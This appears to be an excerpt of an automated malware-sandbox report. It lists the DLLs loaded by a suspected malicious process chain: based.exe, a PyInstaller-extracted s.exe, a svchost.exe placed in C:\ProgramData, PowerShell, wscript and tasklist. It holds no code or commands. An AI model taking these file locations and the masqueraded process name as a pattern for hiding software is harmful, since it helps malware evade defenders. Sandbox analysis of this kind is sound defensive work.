                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: avicap32.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msvfw32.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dciman32.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmmbase.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: mmdevapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: ksuser.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: avrt.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: audioses.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msacm32.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: midimap.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: dxgidebug.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sfc_os.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: dwmapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: riched20.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: usp10.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: msls31.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windowscodecs.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: textinputframework.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coreuicomponents.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windows.storage.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wldp.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: propsys.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: profapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: edputil.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: urlmon.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: iertutil.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: srvcli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: netutils.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: policymanager.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: msvcp110_win.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: appresolver.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: bcp47langs.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: slc.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: userenv.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sppc.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: pcacli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
